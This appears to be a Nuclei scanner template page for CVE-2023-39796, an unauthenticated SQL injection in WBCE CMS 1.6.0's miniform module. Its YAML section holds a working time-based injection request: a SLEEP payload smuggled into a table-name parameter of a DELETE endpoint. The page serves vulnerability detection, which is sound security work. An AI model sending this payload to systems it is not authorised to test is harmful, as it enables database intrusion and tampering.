Skip to content
Nuclei Templates

WBCE 1.6.0 - SQL Injection

ID: CVE-2023-39796

Severity: critical

Author: youngpope

Tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive

Description

Section titled “Description”

There is an sql injection vulnerability in “miniform module” which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file “/modules/miniform/ajax_delete_message.php” there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.

YAML Source

Section titled “YAML Source”
id: CVE-2023-39796


info:
  name: WBCE 1.6.0 - SQL Injection
  author: youngpope
  severity: critical
  description: |
    There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
  remediation: Fixed in version 1.6.1
  reference:
    - https://forum.wbce.org/viewtopic.php?pid=42046#p42046
    - https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
    - https://pastebin.com/PBw5AvGp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39796
    cwe-id: CWE-89
    epss-score: 0.05018
    epss-percentile: 0.92857
    cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wbce
    product: wbce_cms
  tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive


http:
  - raw:
      - |
        @timeout: 20s
        POST /modules/miniform/ajax_delete_message.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record


    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_1 == 200'
          - 'contains(body, "Record deleted successfully!")'
        condition: and
# digest: 4a0a004730450221009a866409b4da788db867ccd8fbb33d9708e20222726167f774e26035c2d199010220565cf72373fae6203820195222484da09428bbad9bb15a9d585309e345a67f1d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39796.yaml"

View on Github